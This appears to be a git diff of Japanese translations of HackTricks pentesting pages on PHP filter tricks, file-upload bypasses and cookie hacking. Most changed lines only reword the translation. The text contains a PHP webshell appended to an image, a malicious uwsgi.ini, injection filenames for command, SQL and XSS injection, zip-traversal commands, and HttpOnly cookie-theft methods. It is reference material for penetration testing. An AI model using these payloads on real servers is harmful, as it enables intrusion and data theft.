 **初期プレフィックスを削除する**トリックは、**ペイロードを3回base64エンコード**し、その後`convert.base64-decode`フィルターを介してデコードすることです。これは、**base64デコード時にPHPが奇妙な文字を削除するため**です。したがって、3回後には**攻撃者によって送信された****ペイロード**のみが**残ります**（その後、攻撃者は初期部分を制御できます）。
 
-元の詳細は[https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/)にあり、最終的なエクスプロイトは[https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)です。\
+詳細はオリジナルの解説にあります[https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/)と最終的なエクスプロイト[https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\
 別の解説は[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)にあります。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index 99ef3fb76..ec32a6fd8 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -2,6 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+
 ## ファイルアップロード一般的手法
 
 他の有用な拡張子：
@@ -21,7 +22,7 @@
 2. _実行拡張子の前に**有効な拡張子を追加**してチェックします（前の拡張子も使用）:_
 - _file.png.php_
 - _file.png.Php5_
-3. **特殊文字を末尾に追加**してみてください。Burpを使用してすべての**ascii**および**Unicode**文字を**ブルートフォース**することができます。 (_前述の**拡張子**を使用しても良いです_)
+3. **特殊文字を末尾に追加**してみてください。Burpを使用してすべての**ascii**および**Unicode**文字を**ブルートフォース**することができます。 (_前述の**拡張子**を使用しても良いことに注意してください_)
 - _file.php%20_
 - _file.php%0a_
 - _file.php%00_
@@ -31,7 +32,7 @@
 - _file._
 - _file.php...._
 - _file.pHp5...._
-4. **サーバー側の拡張子パーサーをだまして**保護をバイパスしてみてください。**拡張子を二重にする**か、**ジャンク**データ（**null**バイト）を拡張子の間に追加します。 _前の拡張子を使用して、より良いペイロードを準備することもできます。_
+4. **サーバー側の拡張子パーサーをだまして**保護をバイパスしてみてください。**拡張子を二重にする**か、**ジャンク**データ（**null**バイト）を拡張子の間に追加する技術を使用します。 _より良いペイロードを準備するために**前の拡張子**を使用することもできます。_
 - _file.png.php_
 - _file.png.pHp5_
 - _file.php#.png_
@@ -43,7 +44,7 @@
 5. 前のチェックに**別の拡張子の層を追加**します:
 - _file.png.jpg.php_
 - _file.php%00.png%00.jpg_
-6. **有効な拡張子の前にexec拡張子を置き**、サーバーが誤って設定されていることを祈ります。（拡張子が**.php**で終わらないが、**.php**で終わるものはすべてコードを実行するApacheの誤設定を悪用するのに役立ちます）:
+6. **有効な拡張子の前にexec拡張子を置いて**、サーバーが誤って設定されていることを祈ります。（拡張子が**.php**で終わらないが、**.php**で終わるものはすべてコードを実行するApacheの誤設定を悪用するのに役立ちます）:
 - _例: file.php.png_
 7. **Windows**の**NTFS代替データストリーム（ADS）**を使用します。この場合、禁止された拡張子の後にコロン文字「:」を挿入し、許可された拡張子の前に挿入します。その結果、サーバー上に**禁止された拡張子の空のファイル**が作成されます（例: “file.asax:.jpg”）。このファイルは、他の技術を使用して後で編集することができます。 “**::$data**”パターンを使用して非空のファイルを作成することもできます。したがって、このパターンの後にドット文字を追加することも、さらなる制限をバイパスするのに役立ちます（例: “file.asp::$data.”）
 8. ファイル名の制限を破ることを試みます。有効な拡張子が切り捨てられ、悪意のあるPHPが残ります。 AAA<--SNIP-->AAA.php
@@ -51,7 +52,7 @@
 ```
 # Linuxの最大255バイト
 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
-Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ab3Ab4Ab5Ab6Ab7Ab8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # ここで4を引き、.pngを追加
+Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # ここで4を引き、.pngを追加
 # ファイルをアップロードし、許可される文字数の応答を確認します。236としましょう
 python -c 'print "A" * 232'
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@@ -59,7 +60,7 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAA<--SNIP 232 A-->AAA.php.png
 ```
 
-### Content-Type、マジックナンバー、圧縮＆リサイズのバイパス
+### Content-Type、マジックナンバー、圧縮およびリサイズのバイパス
 
 - **Content-Type**チェックをバイパスするには、**Content-Type** **ヘッダー**の**値**を次のように設定します: _image/png_ , _text/plain , application/octet-stream_
 1. Content-Type **ワードリスト**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
@@ -69,7 +70,7 @@ AAA<--SNIP 232 A-->AAA.php.png
 `echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
 - **圧縮が画像に追加されている**場合、たとえば、[PHP-GD](https://www.php.net/manual/fr/book.image.php)のような標準のPHPライブラリを使用している場合、前述の技術は役に立ちません。しかし、**PLTEチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
 - [**コードのあるGithub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
-- ウェブページが画像を**リサイズ**している場合、たとえば、PHP-GD関数`imagecopyresized`または`imagecopyresampled`を使用している場合、前述の技術は役に立ちません。しかし、**IDATチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
+- ウェブページが画像を**リサイズ**している可能性もあります。たとえば、PHP-GD関数`imagecopyresized`または`imagecopyresampled`を使用しています。しかし、**IDATチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
 - [**コードのあるGithub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
 - 画像のリサイズに耐えるペイロードを作成する別の技術として、PHP-GD関数`thumbnailImage`を使用します。しかし、**tEXtチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
 - [**コードのあるGithub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
@@ -84,13 +85,13 @@ AAA<--SNIP 232 A-->AAA.php.png
 3. **“.”、 “..”、または “…”**を名前に持つファイルをアップロードします。たとえば、Apacheの**Windows**では、アプリケーションがアップロードされたファイルを「/www/uploads/」ディレクトリに保存する場合、「.」というファイル名は「/www/」ディレクトリに「uploads」というファイルを作成します。
 4. **NTFS**で簡単に削除できないファイル（例: **“…:.jpg”**）をアップロードします。（Windows）
 5. **無効な文字**（例: `|<>*?”`）を名前に持つファイルを**Windows**にアップロードします。（Windows）
-6. **予約された**（**禁止された**）**名前**（例: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9）を持つファイルを**Windows**にアップロードします。
+6. **予約された**（**禁止された**）**名前**（例: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9）を使用してファイルを**Windows**にアップロードします。
 - また、**実行可能ファイル**（.exe）や**.html**（あまり疑わしくない）をアップロードして、被害者が誤って開いたときに**コードを実行**させることを試みてください。
 
 ### 特殊な拡張子のトリック
 
-**PHPサーバー**にファイルをアップロードしようとしている場合、[コードを実行するための**.htaccess**トリックを確認してください](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess)。\
-**ASPサーバー**にファイルをアップロードしようとしている場合、[コードを実行するための**.config**トリックを確認してください](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
+**PHPサーバー**にファイルをアップロードしようとしている場合は、[コードを実行するための**.htaccess**トリックを確認してください](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess)。\
+**ASPサーバー**にファイルをアップロードしようとしている場合は、[コードを実行するための**.config**トリックを確認してください](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
 
 `.phar`ファイルはJavaの`.jar`のようなもので、PHP用であり、**PHPファイルのように使用**できます（PHPで実行したり、スクリプト内に含めたりできます...）
 
@@ -106,7 +107,7 @@ JettyサーバーにXMLファイルをアップロードできる場合、[**新
 
 この脆弱性の詳細な調査については、元の研究を確認してください: [uWSGI RCEの悪用](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)。
 
-リモートコマンド実行（RCE）脆弱性は、`.ini`構成ファイルを変更する能力がある場合、uWSGIサーバーで悪用できます。uWSGI構成ファイルは、"magic"変数、プレースホルダー、および演算子を組み込むために特定の構文を利用します。特に、`@(filename)`として使用される'@'演算子は、ファイルの内容を含めるために設計されています。uWSGIでサポートされているさまざまなスキームの中で、"exec"スキームは特に強力で、プロセスの標準出力からデータを読み取ることを可能にします。この機能は、`.ini`構成ファイルが処理されるときに、リモートコマンド実行や任意のファイルの書き込み/読み取りなどの悪意のある目的に悪用される可能性があります。
+リモートコマンド実行（RCE）脆弱性は、`.ini`構成ファイルを変更する能力がある場合、uWSGIサーバーで悪用できます。uWSGI構成ファイルは、"magic"変数、プレースホルダー、および演算子を組み込むために特定の構文を利用します。特に、`@(filename)`として使用される'@'演算子は、ファイルの内容を含めるために設計されています。uWSGIでサポートされているさまざまなスキームの中で、"exec"スキームは特に強力で、プロセスの標準出力からデータを読み取ることを可能にします。この機能は、`.ini`構成ファイルが処理されるときに、リモートコマンド実行や任意のファイルの書き込み/読み取りなどの悪意のある目的に操作される可能性があります。
 
 以下は、さまざまなスキームを示す有害な`uwsgi.ini`ファイルの例です:
 ```ini
@@ -128,11 +129,11 @@ characters = @(call://uwsgi_func)
 ```
 ペイロードの実行は、設定ファイルの解析中に発生します。設定が有効化され、解析されるためには、uWSGIプロセスを再起動する必要があります（クラッシュ後やサービス拒否攻撃のために）またはファイルを自動再読み込みに設定する必要があります。自動再読み込み機能が有効になっている場合、変更を検出すると指定された間隔でファイルが再読み込みされます。
 
-uWSGIの設定ファイル解析の緩い性質を理解することが重要です。具体的には、議論されたペイロードはバイナリファイル（画像やPDFなど）に挿入でき、潜在的な悪用の範囲をさらに広げることができます。
+uWSGIの設定ファイル解析の緩い性質を理解することが重要です。具体的には、議論されたペイロードはバイナリファイル（画像やPDFなど）に挿入でき、潜在的な悪用の範囲をさらに広げます。
 
 ## **wget File Upload/SSRF Trick**
 
-場合によっては、サーバーが**`wget`**を使用して**ファイルをダウンロード**しており、**URL**を**指定**できることがあります。この場合、コードはダウンロードされたファイルの拡張子がホワイトリストに含まれているかを確認して、許可されたファイルのみがダウンロードされることを保証しているかもしれません。しかし、**このチェックは回避可能です。**\
+場合によっては、サーバーが**`wget`**を使用して**ファイルをダウンロード**しており、**URL**を**指定**できることがあります。この場合、コードはダウンロードされたファイルの拡張子がホワイトリスト内にあるかどうかを確認して、許可されたファイルのみがダウンロードされることを保証しているかもしれません。しかし、**このチェックは回避可能です。**\
 **linux**における**ファイル名**の**最大**長は**255**ですが、**wget**はファイル名を**236**文字に切り詰めます。**"A"\*232+".php"+".gif"**という名前のファイルを**ダウンロード**できます。このファイル名は**チェックを回避**します（この例では**".gif"**は**有効**な拡張子です）が、`wget`はファイル名を**"A"\*232+".php"**に**変更**します。
 ```bash
 #Create file and HTTP server
@@ -160,23 +161,23 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 
 ## ツール
 
-- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) は、ペンテスターやバグハンターがファイルアップロードメカニズムをテストするのを支援するために設計された強力なツールです。さまざまなバグバウンティ技術を活用して、脆弱性の特定と悪用のプロセスを簡素化し、Webアプリケーションの徹底的な評価を保証します。
+- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) は、ペンテスターやバグハンターがファイルアップロードメカニズムをテストするために設計された強力なツールです。さまざまなバグバウンティ技術を活用して、脆弱性の特定と悪用のプロセスを簡素化し、Webアプリケーションの徹底的な評価を保証します。
 
 ## ファイルアップロードから他の脆弱性へ
 
-- **filename** を `../../../tmp/lol.png` に設定して、**パストラバーサル**を試みてください。
-- **filename** を `sleep(10)-- -.jpg` に設定すると、**SQLインジェクション**を達成できるかもしれません。
-- **filename** を `<svg onload=alert(document.domain)>` に設定して、XSSを達成してください。
-- **filename** を `; sleep 10;` に設定して、いくつかのコマンドインジェクションをテストします（詳細な [コマンドインジェクションのトリックはこちら](../command-injection.md)）。
+- **filename**を`../../../tmp/lol.png`に設定して**パストラバーサル**を試みる
+- **filename**を`sleep(10)-- -.jpg`に設定すると、**SQLインジェクション**を達成できるかもしれません
+- **filename**を`<svg onload=alert(document.domain)>`に設定してXSSを達成する
+- **filename**を`; sleep 10;`に設定してコマンドインジェクションをテストする（他の[コマンドインジェクションのトリックはこちら](../command-injection.md)）
 - [**XSS** in image (svg) file upload](../xss-cross-site-scripting/#xss-uploading-files-svg)
 - **JS**ファイル**アップロード** + **XSS** = [**Service Workers**の悪用](../xss-cross-site-scripting/#xss-abusing-service-workers)
 - [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
 - [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
-- [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)から**異なるsvgペイロード**を試してください。
+- [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)から**異なるsvgペイロード**を試す
 - [有名な**ImageTrick**脆弱性](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
-- **URLから画像を取得するようにWebサーバーを指示できる**場合、[SSRF](../ssrf-server-side-request-forgery/)を悪用することを試みることができます。この**画像**が**公開**サイトに**保存**される場合、[https://iplogger.org/invisible/](https://iplogger.org/invisible/)からのURLを指定して、**すべての訪問者の情報を盗む**こともできます。
-- [**XXEとCORS**のバイパスをPDF-Adobeアップロードで実行](pdf-upload-xxe-and-cors-bypass.md)
-- 特別に作成されたPDFでXSS: [次のページでは、**PDFデータを注入してJS実行を取得する方法**を示しています](../xss-cross-site-scripting/pdf-injection.md)。PDFをアップロードできる場合、指定された指示に従って任意のJSを実行するPDFを準備できます。
+- **URLから画像を取得するようにWebサーバーを指示できる**場合、[SSRF](../ssrf-server-side-request-forgery/)を悪用することを試みることができます。この**画像**が**公開**サイトに**保存**される場合、[https://iplogger.org/invisible/](https://iplogger.org/invisible/)からのURLを指定して、**訪問者の情報を盗む**こともできます。
+- [PDF-Adobeアップロードによる**XXEとCORS**バイパス](pdf-upload-xxe-and-cors-bypass.md)
+- 特別に作成されたPDFによるXSS: [次のページでは、**PDFデータを注入してJS実行を取得する方法**を示しています](../xss-cross-site-scripting/pdf-injection.md)。PDFをアップロードできる場合、与えられた指示に従って任意のJSを実行するPDFを準備できます。
 - \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt))の内容をアップロードして、サーバーに**ウイルス対策ソフト**があるかどうかを確認します。
 - ファイルをアップロードする際に**サイズ制限**があるかどうかを確認します。
 
@@ -193,7 +194,7 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 9. **ZIP**: LFI経由のRCE / DoS
 10. **PDF / PPTX**: SSRF / BLIND XXE
 
-#### Burp拡張
+#### Burp拡張機能
 
 {% embed url="https://github.com/portswigger/upload-scanner" %}
 
@@ -216,7 +217,7 @@ ln -s ../../../index.php symindex.txt
 zip --symlinks test.zip symindex.txt
 tar -cvf test.tar symindex.txt
 ```
-### 異なるフォルダに展開する
+### 異なるフォルダーに展開する
 
 展開中にディレクトリ内にファイルが予期せず作成されることは重大な問題です。この設定が悪意のあるファイルアップロードによるOSレベルのコマンド実行から守ると最初は考えられていましたが、ZIPアーカイブ形式の階層的圧縮サポートとディレクトリトラバーサル機能が悪用される可能性があります。これにより、攻撃者は制限を回避し、ターゲットアプリケーションの展開機能を操作することで安全なアップロードディレクトリから脱出することができます。
 
@@ -251,7 +252,7 @@ create_zip()
 
 さらなる詳細は**元の投稿を確認してください**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
 
-1.  **PHPシェルの作成**: PHPコードは、`$_REQUEST`変数を通じて渡されたコマンドを実行するために書かれています。
+1.  **PHPシェルの作成**: PHPコードは、`$_REQUEST`変数を通じて渡されたコマンドを実行するように書かれています。
 
 ```php
 <?php
@@ -297,9 +298,9 @@ PNGファイルのIDATチャンクにPHPシェルを埋め込むことで、特
 
 ポリグロットファイルはサイバーセキュリティにおいてユニークなツールとして機能し、複数のファイル形式に同時に有効に存在できるカメレオンのような役割を果たします。興味深い例としては、GIFとRARアーカイブの両方として機能するハイブリッドである[GIFAR](https://en.wikipedia.org/wiki/Gifar)があります。このようなファイルはこのペアリングに限らず、GIFとJSやPPTとJSの組み合わせも可能です。
 
-ポリグロットファイルの主な利点は、タイプに基づいてファイルをスクリーニングするセキュリティ対策を回避する能力にあります。さまざまなアプリケーションでは、JPEG、GIF、DOCなどの特定のファイルタイプのみをアップロードすることが一般的であり、潜在的に有害な形式（例：JS、PHP、またはPharファイル）によるリスクを軽減します。しかし、ポリグロットは複数のファイルタイプの構造基準に適合することで、これらの制限を巧妙に回避できます。
+ポリグロットファイルの主な利点は、タイプに基づいてファイルをスクリーニングするセキュリティ対策を回避する能力にあります。さまざまなアプリケーションでは、JPEG、GIF、DOCなどの特定のファイルタイプのみをアップロードすることが一般的であり、潜在的に有害なフォーマット（例：JS、PHP、Pharファイル）によるリスクを軽減します。しかし、ポリグロットは複数のファイルタイプの構造基準に適合することで、これらの制限を巧妙に回避できます。
 
-適応性があるにもかかわらず、ポリグロットには制限もあります。たとえば、ポリグロットがPHARファイル（PHp ARchive）とJPEGを同時に具現化している場合でも、そのアップロードの成功はプラットフォームのファイル拡張子ポリシーに依存することがあります。システムが許可される拡張子に厳格である場合、ポリグロットの単なる構造的二重性ではアップロードを保証するには不十分な場合があります。
+適応性がある一方で、ポリグロットには制限もあります。たとえば、ポリグロットがPHARファイル（PHp ARchive）とJPEGを同時に具現化している場合でも、そのアップロードの成功はプラットフォームのファイル拡張子ポリシーに依存することがあります。システムが許可される拡張子に厳格である場合、ポリグロットの単なる構造的二重性ではアップロードを保証するには不十分な場合があります。
 
 詳細情報は次のリンクにあります: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md
index 14e8ce927..5390f69f8 100644
--- a/src/pentesting-web/hacking-with-cookies/README.md
+++ b/src/pentesting-web/hacking-with-cookies/README.md
@@ -1,147 +1,147 @@
-# Cookies Hacking
+# クッキーのハッキング
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Cookie Attributes
+## クッキー属性
 
-Cookiesには、ユーザーのブラウザでの動作を制御するいくつかの属性があります。これらの属性について、より受動的な声で説明します。
+クッキーには、ユーザーのブラウザでの動作を制御するいくつかの属性があります。これらの属性について、より受動的な表現で説明します。
 
-### Expires and Max-Age
+### Expires と Max-Age
 
-Cookieの有効期限は`Expires`属性によって決まります。対照的に、`Max-age`属性はCookieが削除されるまでの時間（秒単位）を定義します。**`Max-age`を選択することをお勧めします。これはより現代的な慣行を反映しています。**
+クッキーの有効期限は `Expires` 属性によって決まります。一方、`Max-age` 属性は、クッキーが削除されるまでの時間（秒単位）を定義します。**より現代的な慣行を反映するために `Max-age` を選択してください。**
 
 ### Domain
 
-Cookieを受け取るホストは`Domain`属性によって指定されます。デフォルトでは、これはCookieを発行したホストに設定され、サブドメインは含まれません。しかし、`Domain`属性が明示的に設定されると、サブドメインも含まれます。これにより、サブドメイン間でのCookie共有が必要なシナリオで、`Domain`属性の指定が制限の少ないオプションとなります。たとえば、`Domain=mozilla.org`を設定すると、`developer.mozilla.org`のようなサブドメインでもCookieにアクセスできます。
+クッキーを受け取るホストは `Domain` 属性によって指定されます。デフォルトでは、これはクッキーを発行したホストに設定され、サブドメインは含まれません。ただし、`Domain` 属性が明示的に設定されると、サブドメインも含まれます。これにより、サブドメイン間でのクッキー共有が必要なシナリオで、`Domain` 属性の指定が制限の少ないオプションとなります。たとえば、`Domain=mozilla.org` を設定すると、`developer.mozilla.org` のようなサブドメインでもクッキーにアクセスできます。
 
 ### Path
 
-`Cookie`ヘッダーが送信されるために要求されたURLに存在しなければならない特定のURLパスは、`Path`属性によって示されます。この属性は`/`文字をディレクトリセパレーターとして考慮し、サブディレクトリ内での一致も可能にします。
+`Cookie` ヘッダーが送信されるために、要求された URL に存在しなければならない特定の URL パスは `Path` 属性によって示されます。この属性は `/` 文字をディレクトリ区切りとして扱い、サブディレクトリ内でも一致を許可します。
 
 ### Ordering Rules
 
-同じ名前のCookieが2つある場合、送信されるCookieは以下に基づいて選択されます：
+同じ名前のクッキーが2つある場合、送信されるクッキーは以下に基づいて選択されます：
 
-- 要求されたURL内で最も長いパスに一致するCookie。
-- パスが同じ場合は、最も最近設定されたCookie。
+- 要求された URL で最も長いパスに一致するクッキー。
+- パスが同じ場合は、最も最近設定されたクッキー。
 
 ### SameSite
 
-- `SameSite`属性は、Cookieがサードパーティのドメインからのリクエストで送信されるかどうかを決定します。3つの設定があります：
-- **Strict**: サードパーティのリクエストでCookieが送信されるのを制限します。
-- **Lax**: サードパーティのウェブサイトによって開始されたGETリクエストでCookieが送信されることを許可します。
-- **None**: どのサードパーティのドメインからでもCookieが送信されることを許可します。
+- `SameSite` 属性は、サードパーティのドメインからのリクエストでクッキーが送信されるかどうかを決定します。3つの設定があります：
+- **Strict**: サードパーティのリクエストでクッキーが送信されるのを制限します。
+- **Lax**: サードパーティのウェブサイトによって開始された GET リクエストでクッキーが送信されることを許可します。
+- **None**: どのサードパーティのドメインからでもクッキーが送信されることを許可します。
 
-Cookieを設定する際には、これらの属性を理解することで、さまざまなシナリオで期待通りに動作することを確保できます。
+クッキーを設定する際には、これらの属性を理解することで、さまざまなシナリオで期待通りに動作することを確保できます。
 
-| **Request Type** | **Example Code**                   | **Cookies Sent When** |
+| **リクエストタイプ** | **例コード**                   | **クッキーが送信されるとき** |
 | ---------------- | ---------------------------------- | --------------------- |
-| Link             | \<a href="...">\</a>               | NotSet\*, Lax, None   |
-| Prerender        | \<link rel="prerender" href=".."/> | NotSet\*, Lax, None   |
-| Form GET         | \<form method="GET" action="...">  | NotSet\*, Lax, None   |
-| Form POST        | \<form method="POST" action="..."> | NotSet\*, None        |
+| リンク             | \<a href="...">\</a>               | NotSet\*, Lax, None   |
+| プリレンダリング        | \<link rel="prerender" href=".."/> | NotSet\*, Lax, None   |
+| フォーム GET         | \<form method="GET" action="...">  | NotSet\*, Lax, None   |
+| フォーム POST        | \<form method="POST" action="..."> | NotSet\*, None        |
 | iframe           | \<iframe src="...">\</iframe>      | NotSet\*, None        |
 | AJAX             | $.get("...")                       | NotSet\*, None        |
-| Image            | \<img src="...">                   | NetSet\*, None        |
+| 画像            | \<img src="...">                   | NetSet\*, None        |
 
-Table from [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/) and slightly modified.\
-_**SameSite**_属性を持つCookieは、**CSRF攻撃を軽減**します。
+表は [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/) からのもので、若干修正されています。\
+_**SameSite**_ 属性を持つクッキーは、**CSRF攻撃を軽減**します。
 
-**\*Chrome80（2019年2月）以降、CookieにSameSite属性がない場合のデフォルトの動作はLaxになります** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
-この変更を適用した後、一時的にChromeでは**SameSiteポリシーのないCookie**は**最初の2分間はNoneとして扱われ、その後はトップレベルのクロスサイトPOSTリクエストに対してLaxとして扱われます。**
+**\*Chrome80（2019年2月）以降、SameSite 属性を持たないクッキーのデフォルトの動作は Lax になります** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
+この変更を適用した後、一時的に、Chrome の **SameSite ポリシーを持たないクッキーは最初の2分間は None として扱われ、その後はトップレベルのクロスサイト POST リクエストに対して Lax として扱われます。**
 
-## Cookies Flags
+## クッキーのフラグ
 
 ### HttpOnly
 
-これにより、**クライアント**がCookieにアクセスするのを防ぎます（例えば、**Javascript**経由で：`document.cookie`）。
+これにより、**クライアント**がクッキーにアクセスするのを防ぎます（例えば、**Javascript** を介して：`document.cookie`）。
 
-#### **Bypasses**
+#### **バイパス**
 
-- ページがリクエストのレスポンスとしてCookieを**送信している**場合（例えば、**PHPinfo**ページで）、XSSを悪用してこのページにリクエストを送り、レスポンスから**Cookieを盗む**ことが可能です（例は[こちら](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/)を参照）。
-- **TRACE** **HTTP**リクエストを使用することでバイパス可能です。サーバーからのレスポンスは送信されたCookieを反映します。この技術は**Cross-Site Tracking**と呼ばれます。
-- この技術は、**モダンブラウザがJSからTRACEリクエストを送信することを許可しないことによって回避されます**。ただし、IE6.0 SP2に対して`TRACE`の代わりに`\r\nTRACE`を送信するなど、特定のソフトウェアでのバイパスが見つかっています。
-- もう一つの方法は、ブラウザのゼロデイ脆弱性を悪用することです。
-- Cookie Jarオーバーフロー攻撃を実行することで、**HttpOnly Cookieを上書きする**ことが可能です：
+- ページがリクエストのレスポンスとしてクッキーを**送信している**場合（例えば、**PHPinfo** ページで）、XSS を悪用してこのページにリクエストを送り、レスポンスから**クッキーを盗む**ことが可能です（例は [https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/) を参照）。
+- **TRACE** **HTTP** リクエストを使用することでバイパス可能です。サーバーからのレスポンスは送信されたクッキーを反映します。この技術は **Cross-Site Tracking** と呼ばれます。
+- この技術は、**モダンブラウザが JS から TRACE リクエストを送信することを許可しないことによって回避されます**。ただし、特定のソフトウェアでは、`TRACE` の代わりに `\r\nTRACE` を送信することでバイパスが見つかっています。
+- 別の方法は、ブラウザのゼロデイ脆弱性を悪用することです。
+- クッキージャーオーバーフロー攻撃を実行することで、**HttpOnly クッキーを上書きする**ことが可能です：
 
 {{#ref}}
 cookie-jar-overflow.md
 {{#endref}}
 
-- これらのCookieを外部に持ち出すために[**Cookie Smuggling**](./#cookie-smuggling)攻撃を使用することが可能です。
+- これらのクッキーを外部に持ち出すために [**Cookie Smuggling**](./#cookie-smuggling) 攻撃を使用することが可能です。
 
 ### Secure
 
-リクエストは、**HTTPS**などの安全なチャネルを介して送信される場合にのみ、HTTPリクエストでCookieを**送信します**。
+リクエストは、**HTTPS** などの安全なチャネルを介して送信される場合にのみ、HTTP リクエストでクッキーを**送信します**。
 
-## Cookies Prefixes
